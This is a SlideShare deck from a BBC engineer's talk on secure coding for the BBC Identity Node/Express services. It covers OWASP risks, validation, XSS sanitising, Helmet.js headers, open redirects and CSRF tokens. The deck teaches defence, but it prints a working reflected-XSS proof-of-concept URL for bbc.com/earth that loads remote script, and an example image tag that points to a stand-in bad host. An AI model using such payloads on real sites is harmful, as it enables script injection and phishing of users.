SlideShare a Scribd company logo
WWW.MARCLITTLEMORE.COM
SECURING YOUR
BBC IDENTITY
MARC LITTLEMORE
MARC LITTLEMORE
PRINCIPAL SOFTWARE ENGINEER
NODE / JAVASCRIPT
“DIGITAL SECURITY CHAMPION”
19+ YEARS C/C++ VIDEOGAMES
NO SECURITY BACKGROUND
MARC LITTLEMORE
PRINCIPAL SOFTWARE ENGINEER
NODE / JAVASCRIPT
I USE
SEMICOLONS
#oldschoolcprogrammer
@marclittlemore
github.com/marcl
marc@marclittlemore.com
www.marclittlemore.com
MARC LITTLEMORE
WHAT’S THIS ALL ABOUT?
MOSTLY SECURE CODING
WHY DEVELOPERS SHOULD CARE
BBC ID ARCHITECTURE
BECOMING A “SECURITY EXPERT”
OWASP TOP 10
ENCRYPT TRAFFIC (VERY BRIEFLY)
WHAT’S THIS ALL ABOUT?
WHAT’S THIS ALL ABOUT?
INPUT VALIDATION
OUTPUT SANITISATION (XSS)
ID-NODE-SERVER
EXPRESS SECURITY MIDDLEWARE
CROSS SITE REQUEST FORGERY
// TODO : FUTURE WORK
WHY DEVELOPERS SHOULD
CARE ABOUT SECURITY
https://haveibeenpwned.com
http://uk.businessinsider.com/cheating-affair-website-ashley-madison-hacked-user-data-leaked-2015-7
http://www.theverge.com/2016/10/21/13362354/dyn-dns-ddos-attack-cause-outage-status-explained
https://snyk.io/blog/77-percent-of-sites-use-vulnerable-js-libraries/
ALL OF YOUR ACCOUNTS ARE ON
HAVEIBEENPWNED.COM
YOUR APPLICATIONS
MUST BE SO SECURE
WHY DOES IT MATTER?
I’M JUST A DEVELOPER
“YOU BETTER CHECK YO SELF
BEFORE YOU WRECK YO SELF”
LOSS OF PERSONAL DATA
EXPOSURE OF INTERNAL DATA
MALWARE
RANSOMWARE
DATA INTERCEPTION
DENIAL OF SERVICE
LULZ
I DID IT FOR THE
I DID IT FOR THE
$$$$$
£££££
€€€€€
“APPLICATION SECURITY IS
IMPORTANT YO!”*
“APPLICATION SECURITY IS
IMPORTANT YO!”*
* ICE CUBE DIDN’T SAY THIS BUT I’M SURE HE AGREES
BBC IDENTITY
APPLICATION ARCHITECTURE
JAVASCRIPT EVERYWHERE!
JAVASCRIPT...
JAVASCRIPT EVERYWHERE!
JAVASCRIPT...
JAVASCRIPT EVERYWHERE!
JAVASCRIPT...
PROFILE
BACKEND IDENTITY
APIS
ACCOUNT SESSION
ID FRONTEND
OTHER BBC APIS
HTTPS
(SSL/TLS)
NODE.JS
REACT
AWS
USERS
OPENAM
OPENIDM
OPENAM
SINGLE SIGN-ON
OAUTH 2.0 + OPEN ID CONNECT
USER CREDENTIALS
SESSION DATA + TOKENS
OAUTH CLIENTS FOR MOBILE
OPENIDM
ACCOUNT MANAGEMENT
ADDITIONAL DATA
SUPPORTING FUNCTIONS:
RECRYPTER
EMAIL SERVICES
V4 TO V5 UPDATE
OPENAM / OPENIDM
REST API
+ BBC SPECIFIC FUNCTIONS
NOT OUR TEAM’S APPLICATIONS
OPENAM / OPENIDM
REST API
+ BBC SPECIFIC FUNCTIONS
NOT OUR TEAM’S APPLICATIONS
ACCOUNT
NODE + EXPRESS SERVER
REACT UI
CORE AUTHENTICATION:
REGISTRATION (U13/U18/O18)
SIGN-IN
UPLIFT V4 TO V5
POLICY UPLIFT
ACCOUNT SESSION
SESSION
NODE + EXPRESS SERVER
API ONLY - NO UI
HIGH TRAFFIC
SESSION MANAGEMENT
TOKEN REFRESH
SESSIONACCOUNT
PROFILE
NODE + EXPRESS SERVER
REACT UI
SETTINGS / USER DATA
CHILD/PARENT LINKING
PASSWORD RESET
USES SESSION + ACCOUNT
PROFILE
HOW TO BECOME
A SECURITY EXPERT
HOW TO BECOME
A SECURITY EXPERT
A SECURE CODER
“SECURITY CHAMPION”
“SECURITY CHAMPION”
NOT SECURITY EXPERT
YOU DON’T HAVE TO BE
A SECURITY EXPERT
YOU JUST NEED TO
LEARN & GET STARTED
YOU JUST NEED TO
CARE ABOUT SECURITY
YOU JUST NEED TO
PROTECT YOUR CODE
YOU JUST NEED TO
PROTECT YOUR USERS
HOW I GOT STARTED
CONSULT THE EXPERTS
DINIS CRUZ
WEB APP SECURITY CONSULTANT
@DINISCRUZ
PETER DE ROOIJ
SECURITY SOLUTION ARCHITECT
LINKEDIN.COM/IN/PDEROOIJ
HOW I GOT STARTED
OWASP TOP 10
https://www.owasp.org
OWASP TOP 10 (2013)
A1 INJECTION
A2 BROKEN AUTHENTICATION / SESSION
MANAGEMENT
A3 CROSS SITE SCRIPTING (XSS)
A4 INSECURE DIRECT OBJECT REFERENCES
A5 SECURITY MISCONFIGURATION
OWASP TOP 10
A6 SENSITIVE DATA EXPOSURE
A7 MISSING FUNCTION LEVEL ACCESS
CONTROL
A8 CROSS SITE REQUEST FORGERY (CSRF)
A9 USING COMPONENTS WITH KNOWN
VULNERABILITIES
A10 UNVALIDATED REDIRECTS & FORWARDS
http://nodegoat.herokuapp.com/tutorial
ENCRYPT YOUR TRAFFIC
SAFE TRANSFER OF USER DATA
ENCRYPT YOUR DATA IN TRANSIT
USE SSL/TLS FOR YOUR SITES
EASY TO ENABLE HTTPS
FREE CERTIFICATES
https://letsencrypt.org/
INPUT VALIDATION
DON’T. TRUST. ANYONE.
https://xkcd.com/327/
EXPLOITS OF A MOM (XKCD #327)
VALIDATE
ALL THE THINGS
VALIDATE TOP 500 PASSWORDS
http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/
http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/
TOP 500 PASSWORDS VALIDATED?
http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/
TOP 500 PASSWORDS VALIDATED?
NOPE. USE CLEVER VALIDATION!
http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/
TOP 500 PASSWORDS VALIDATED?
WE ONLY CHECK 17!
VALIDATE ON CLIENT
AND ON SERVER
INPUT VALIDATION
WHITELIST VALIDATION > SIMPLE
VALIDATION
VALIDATE ALL USER INPUT
VALIDATE ON CLIENT AND SERVER
CLEAN & WHITELIST DATA BEFORE API CALLS
BEWARE OF DATA EXPOSURE THROUGH
ERROR MESSAGING...
AVOID DATA EXPOSURE
THROUGH ENUMERATION
AVOID DATA EXPOSURE
HACKERS WILL BRUTE FORCE THIS
AVOID DATA EXPOSURE (IF POSSIBLE)
UX vs SECURITY TRADE-OFF
OUTPUT SANITISATION
DON’T. TRUST. YOURSELF.
OUTPUT SANITISATION
SANITISE BEFORE RE-DISPLAY
HELLO
IS IT XSS YOU’RE LOOKING FOR?
CROSS SITE SCRIPTING (XSS)
INJECTION OF MALICIOUS SCRIPT INTO PAGE
DATA FROM AN UNTRUSTED SOURCE
DATA INCLUDED WITHOUT VALIDATION
STORED XSS
REFLECTED XSS
OUTPUT SANITISATION
A TRUE STORY...
http://www.bbc.com/earth/uk
ONLY A TRIVIAL XSS RIGHT?
DON’T WORRY...
URL
http://www.bbc.com/earth/'-void(a=document.crea
teElement('script'),a.src=decodeURIComponent('h
ttps:%2F%2Frepo.dev.bbc.co.uk%2Fplayout%2Fteam%
2Ft.js'),document.head.appendChild(a))-'
INTERNAL PROOF OF CONCEPT
URL => CODE:
a=document.createElement('script')
a.src=decodeURIComponent('https:%2F%2Frepo.dev.
bbc.co.uk%2Fplayout%2Fteam%2Ft.js')
document.head.appendChild(a))-'
INTERNAL PROOF OF CONCEPT
XSS NOW DISPLAYS SIGN-IN + HACK ON HTTP://WWW.BBC.COM/EARTH/
XSS MITIGATION IS HARD
SANITISE YOUR DATA
https://github.com/leizongmin/js-xss/
https://github.com/salesforce/secure-filters
https://github.com/yahoo/xss-filters
DON’T ROLL YOUR OWN!
http://jsxss.com/
XSS FILTER BEFORE RETURNING TO CLIENT
SANITISE IN CONTEXT
SANITISE AS JS FOR JS OUTPUT
SANITISE AS HTML FOR HTML OUTPUT
WHITELIST TAGS AND ATTRIBUTES
BE CAREFUL WITH QUERY PARAMETERS
PARSING IS HARD!
VALIDATE AND SANITISE
YOU NEED TO DO BOTH
SECURE EXPRESS APPLICATIONS
ID NODE SERVER
SECURE EXPRESS APPLICATIONS
BOOTSTRAP EXPRESS APPS
EXPRESS MIDDLEWARE
MAKES SERVER SECURITY EASIER
MIDDLEWARE #1
EXPRESS
SERVER
REQUEST
RESPONSE
MIDDLEWARE #2
MIDDLEWARE #N
...
ADD
SECURITY
MIDDLEWARE
TO ALL
APPLICABLE
ROUTES
STANDARD SIGNATURE
(REQUEST, RESPONSE, NEXT)
USE HELMET.JS
SET UP HTTP HEADERS
https://helmetjs.github.io/
X-Powered-By
EXPOSE IMPLEMENTATION
HACKER USES TO THEIR ADVANTAGE
JUST REMOVE IT
app.disable(‘x-powered-by’);
X-Powered-By
EXPOSE IMPLEMENTATION
HACKER USES TO THEIR ADVANTAGE
OR CHANGE IT!
app.use(helmet.hidePoweredBy{setTo: 'PHP 4.2.0'});
X-Content-Type-Options
PREVENT CLIENT FROM GUESSING MIME TYPE
SERVER CAN SEND WRONG “CONTENT-TYPE”
BROWSER WILL EXECUTE JAVASCRIPT
<img src=”http://bad.com/bad-html.jpg” />
app.use(helmet.noSniff());
X-Frame-Options
AVOID CLICKJACKING ATTACK
HIDE OUR PAGES IN BAD SITE
PREVENT PUTTING PAGE IN IFRAME
app.use(helmet.frameguard({action: 'deny'}));
X-XSS-Protection
PREVENT REFLECTED XSS ATTACK
*DOESN’T PROTECT YOU FROM ALL XSS*
USE ADDITIONAL XSS PROTECTION
app.use(helmet.xssFilter());
Content-Security-Policy
TELL GOOD JS FROM BAD JS
WHITELIST ALLOWED CONTENT SOURCE
JS / CSS / IMAGES / FONTS
HARD TO GET RIGHT FOR US
app.use(helmet.contentSecurityPolicy(
cspConfiguration
));
Content-Security-Policy
SHARED HEADER (LOADS OTHER RESOURCES)
NO OWNER OF ALL VALID SOURCES
DUAL DOMAIN (BBC.COM & BBC.CO.UK)
SOME “UNSAFE” EXTERNAL DEPENDENCIES
USE REPORT-URI DIRECTIVE FOR FAILURES
OUR CSP POLICY
OUR CSP POLICY
CUSTOM EXPRESS MIDDLEWARE
USEFUL ADDITIONS
FLASH / PDF CAN EMBED YOUR CONTENT
DON’T ALLOW EMBEDS
OWASP RECOMMENDATION
X-Permitted-Cross-Domain-Policies
VALIDATE YOUR REDIRECTS
CONTEXTUAL REDIRECT FOR BBC APPS
THESE COULD BE ABUSED
SEND TO MALICIOUS PAGE WITH BBC
STYLING
OPEN REDIRECTS
WHAT HAPPENS IF WE
RETURN TO NON-BBC PAGE
BUT IT LOOKS LIKE OUR SIGN-IN PAGE?
BAD TIMES
REMEMBER OUR XSS
ATTACK?
CHECK FOR “LOCATION” HEADER
WHITELIST URLS
REWRITE TO SAFE URL IF UNKNOWN
SECURED OPEN REDIRECTS
https://github.com/MarcL/secure-redirects
https://github.com/MarcL/secure-redirects
MY OPEN SOURCE PACKAGE
npm install secure-redirects
CROSS-SITE REQUEST FORGERY
AUTHENTICATION GOES BAD
USER IS AUTHENTICATED
CLICKS ON MALICIOUS LINK
REQUEST HAS SIDE EFFECTS / MUTATES STATE
BROWSER SENDS AUTHENTICATED COOKIES
USER COMPROMISED WITHOUT REALISING
WHAT IS CSRF?
SESSION
OBTAIN OAUTH AUTHORISATION
TRICKED INTO ACQUIRING ACCESS TOKEN
PROFILE
SUBMIT USER PROFILE CHANGES
ACCESS USER DATA
WHY CSRF MATTERS TO BBC ID
AUTHORISATION
GENERATE NONCE (RANDOM NUMBER USED ONCE)
PASS NONCE IN OAUTH STATE
SET COOKIE WITH NONCE VALUE
MITIGATE CSRF: SESSION
AFTER CALLBACK
RETRIEVE NONCE FROM STATE
RETRIEVE NONCE FROM COOKIE
IF EQUAL THEN ALL IS GOOD
TAMPERED REQUEST IF NOT
REMOVE NONCE COOKIE IN BOTH CASES
MITIGATE CSRF: SESSION
GET PROFILE
GENERATE NONCE
ADD NONCE AS HIDDEN FIELD
SET COOKIE WITH NONCE VALUE
MITIGATE CSRF: PROFILE
POST PROFILE
RETRIEVE NONCE FROM HIDDEN FIELD
RETRIEVE NONCE FROM COOKIE
IF EQUAL THEN ALL IS GOOD
TAMPERED REQUEST IF NOT
REMOVE NONCE COOKIE IN BOTH CASES
MITIGATE CSRF: SESSION
https://github.com/expressjs/csurf
ADDITIONAL SECURITY
WHAT I HAVEN’T TALKED ABOUT
HTTP CLIENT FOR ALL API REQUESTS
ACCOUNT LOCKING
SECURE CONFIGURATION
HTTPONLY COOKIE FLAGS
LIMIT REQUEST BODY SIZES
LOCK DEPENDENT PACKAGES
ADDITIONAL SECURITY
// TODO:
FUTURE WORK
// TODO: FUTURE WORK
WHITELIST REDIRECTS
REQUEST PARAMETER POLLUTION
REGULAR EXPRESSION DOS
HTTP STRICT TRANSPORT SECURITY (HSTS)
TIMING ATTACKS
// TODO: FUTURE WORK
ADD SNYK / NSP INTO BUILD PIPELINE
SECURITY TEST SUITE
LOG CHECKING TEST SUITE
MAP ATTACK SURFACES
STRICT SECURITY CODE REVIEWS
TL;DR
SECURITY OVERLOAD
TL;DR
HTTPS ALL THE THINGS
VALIDATE ALL OF YOUR INPUTS
SANITISE ALL OF YOUR OUTPUTS
XSS - ENCODE FOR CONTEXT
PREVENT INTERNAL DISCLOSURE
TL;DR
EXPRESS + HELMET.JS == “EASY WIN”
CUSTOM MIDDLEWARE IF NEEDED
ALWAYS SECURE YOUR REDIRECTS
ADD CSRF TOKENS
TL;DR
CHECK YOUR DEPENDENCIES
STAY UP TO DATE
KEEP LEARNING
TL;DR
YOU’RE NEVER
TOTALLY SECURE
AND REMEMBER
“SECURITY IS A MISSION
“SECURITY IS A MISSION
...NOT AN INTERMISSION”
PAUL BLART, MALL COP 2
@marclittlemore
github.com/marcl
marc@marclittlemore.com
www.marclittlemore.com
THANKS! QUESTIONS?
IMAGE CREDITS
Digital background image / Designed by Freepik
Email icon / Chanut is Industries licensed under CC 3.0 BY
Other Icons / Bogdan Rosu licensed under CC 3.0 BY
All other images / CC0 / Unsplash or Pexels

More Related Content

What's hot

Bug bounty or beg bounty?
Bug bounty or beg bounty?Bug bounty or beg bounty?
Bug bounty or beg bounty?
Casey Ellis
 
ACRNA Webinar #5: Cyber Security – The Unlikely Romance
ACRNA Webinar #5: Cyber Security – The Unlikely RomanceACRNA Webinar #5: Cyber Security – The Unlikely Romance
ACRNA Webinar #5: Cyber Security – The Unlikely Romance
Casey Ellis
 
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...
Casey Ellis
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
Samvel Gevorgyan
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
Samvel Gevorgyan
 
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Yan Cui
 
OWASP, PHP, life and universe
OWASP, PHP, life and universeOWASP, PHP, life and universe
OWASP, PHP, life and universe
Sebastien Gioria
 
KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...
KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...
KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...
Casey Ellis
 
Security perspective -human factor
Security perspective -human factorSecurity perspective -human factor
Security perspective -human factor
Artur Marek Maciąg
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For Money
Shubham Gupta
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
Sagar M Parmar
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
Shahee Mirza
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press website
Deola Kayode
 
Lock it down
Lock it downLock it down
Lock it down
Peter Souter
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
Jeremiah Grossman
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Mazin Ahmed
 
Mobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the CodeMobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the Code
NowSecure
 
Niels G's security websites list
Niels G's security websites listNiels G's security websites list
Niels G's security websites list
Bill Hagestad II
 
DefCamp 2013 - Are we there yet?
DefCamp 2013 - Are we there yet?DefCamp 2013 - Are we there yet?
DefCamp 2013 - Are we there yet?
DefCamp
 

What's hot (20)

Bug bounty or beg bounty?
Bug bounty or beg bounty?Bug bounty or beg bounty?
Bug bounty or beg bounty?
 
ACRNA Webinar #5: Cyber Security – The Unlikely Romance
ACRNA Webinar #5: Cyber Security – The Unlikely RomanceACRNA Webinar #5: Cyber Security – The Unlikely Romance
ACRNA Webinar #5: Cyber Security – The Unlikely Romance
 
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
 
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
 
OWASP, PHP, life and universe
OWASP, PHP, life and universeOWASP, PHP, life and universe
OWASP, PHP, life and universe
 
KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...
KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...
KEYNOTE: Nullcon 2021 - Security Research and Disclosure - The Unauthorized B...
 
Security perspective -human factor
Security perspective -human factorSecurity perspective -human factor
Security perspective -human factor
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For Money
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento Website
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press website
 
Lock it down
Lock it downLock it down
Lock it down
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
 
Mobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the CodeMobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the Code
 
Niels G's security websites list
Niels G's security websites listNiels G's security websites list
Niels G's security websites list
 
DefCamp 2013 - Are we there yet?
DefCamp 2013 - Are we there yet?DefCamp 2013 - Are we there yet?
DefCamp 2013 - Are we there yet?
 

Similar to Securing Your BBC Identity

Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
slicklash
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
Nilesh Sapariya
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
Caleb Sima
 
Hacking 101 (Session 2)
Hacking 101  (Session 2)Hacking 101  (Session 2)
Hacking 101 (Session 2)
Nitroxis Sprl
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
Mike Crabb
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
Eoin Keary
 
2014 06-05-mozilla-afup
2014 06-05-mozilla-afup2014 06-05-mozilla-afup
2014 06-05-mozilla-afup
Sebastien Gioria
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common Attacks
PayPalX Developer Network
 
bh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdfbh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdf
cyberhacker7
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
Cenzic
 
So You Want a Job in Cybersecurity
So You Want a Job in CybersecuritySo You Want a Job in Cybersecurity
So You Want a Job in Cybersecurity
Teri Radichel
 

Similar to Securing Your BBC Identity (20)

Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Hacking 101 (Session 2)
Hacking 101  (Session 2)Hacking 101  (Session 2)
Hacking 101 (Session 2)
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
2014 06-05-mozilla-afup
2014 06-05-mozilla-afup2014 06-05-mozilla-afup
2014 06-05-mozilla-afup
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common Attacks
 
bh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdfbh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdf
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
 
So You Want a Job in Cybersecurity
So You Want a Job in CybersecuritySo You Want a Job in Cybersecurity
So You Want a Job in Cybersecurity
 

Recently uploaded

一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理
dakas1
 
14 th Edition of International conference on computer vision
14 th Edition of International conference on computer vision14 th Edition of International conference on computer vision
14 th Edition of International conference on computer vision
ShulagnaSarkar2
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
XfilesPro
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
Peter Muessig
 
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
kalichargn70th171
 
Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
Drona Infotech
 
SQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure MalaysiaSQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure Malaysia
GohKiangHock
 
Project Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdfProject Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdf
